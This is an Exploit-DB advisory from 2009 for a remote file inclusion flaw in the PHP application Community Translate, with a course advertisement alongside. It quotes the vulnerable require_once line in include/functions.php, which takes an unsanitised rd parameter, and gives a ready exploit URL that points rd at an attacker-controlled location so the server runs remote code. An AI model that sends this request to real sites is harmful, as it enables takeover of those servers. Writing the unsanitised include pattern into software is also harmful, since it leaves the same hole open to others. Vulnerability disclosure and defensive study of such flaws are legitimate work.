Community Translate - Remote File Inclusion

EDB-ID:

10045

CVE:

N/A


Author:

NoGe

Type:

webapps


Platform:

PHP

Date:

2009-10-12


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

[o] Community Translate Remote File Inclusion Vulnerability
Software     : Community Translate
Project Home : http://code.google.com/p/communitytranslate/
Author       : NoGe
Contact      : noge[dot]code[at]gmail[dot]com
Blog         : http://evilc0de.blogspot.com/
Home         : http://antisecurity.org/

[o] Vulnerable file
require_once("$rd/include/utilfunctions.php");

include/functions.php

[o] Exploit
http://localhost/[path]/include/functions.php?rd=[evilc0de]